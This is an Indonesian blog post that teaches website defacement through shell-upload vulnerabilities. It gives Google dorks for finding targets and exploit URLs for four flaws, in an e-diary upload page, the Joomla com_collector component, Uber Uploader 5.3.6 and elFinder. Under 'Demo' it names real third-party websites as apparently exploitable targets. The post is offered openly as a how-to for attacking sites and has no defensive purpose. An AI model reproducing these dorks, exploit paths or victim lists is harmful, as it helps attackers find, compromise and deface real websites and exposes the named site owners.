Deface Dengan Shell Upload

- on 03.21 - No comments

Jika anda ingin melakukan aksi Deface dengan sangat mudah, disini saya akan mengeshare bagaimana cara Deface dengan mudah memanfaatkan Bugs pada shell Upload.

1. Shell Upload “template.php?component=”

Dork: inurl:mdbtemplate/mytemplate
POC/Exploit: http://localhost/e-diary/makehtml/fileupload.php
Demo:
- http://www.old.crcn.in.th/e-diary/makeht…upload.php
- http://www.ped.si.mahidol.ac.th/e-diary/…upload.php

2. Joomla com_collector upload shell

Dork : inurl:index.php?option=com_collector
POC/Exploit : http://localhost/[path]/index.php?option=com_collector&view=filelist&tmpl= component&folder=&type=1
Demo :

http://www.getravel.gr/site/index.php?option=com_collector&view=filelist&tmpl=%20component&folder=&type=1

http://www.immortal-thor.com//index.php?option=com_collector&view=filelist&tmpl=%20component&folder=&type=1
http://belmuzfond.com/index.php?option=com_collector&view=filelist&tmpl=%20component&folder=&type=1
http://www.volontarimini.it/volontarimini2012/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
http://www.moepooladfar.org/index.php?option=com_collector&view=filelist&tmpl=%20component&folder=&type=1

3. Uber Uploader 5.3.6 Vuln Upload

Dork:
“Powered By Uber Uploader”
allinurl: uu_file_upload.php
allinurl: uber_uploader_file.php

POC : http://[localhost]/uploads/file kamu

Demo :

http://tv.fuerzw.de/upload/uu_file_upload.php

http://www.cptmkt.com/uu_file_upload.php

4. elFinder Shell Upload Vulnerability

DORK: inurl:/elfinder/
intitle:index of 
POC: http://localhost/Patch/elfinder/elfinder.php.html or elfinder.php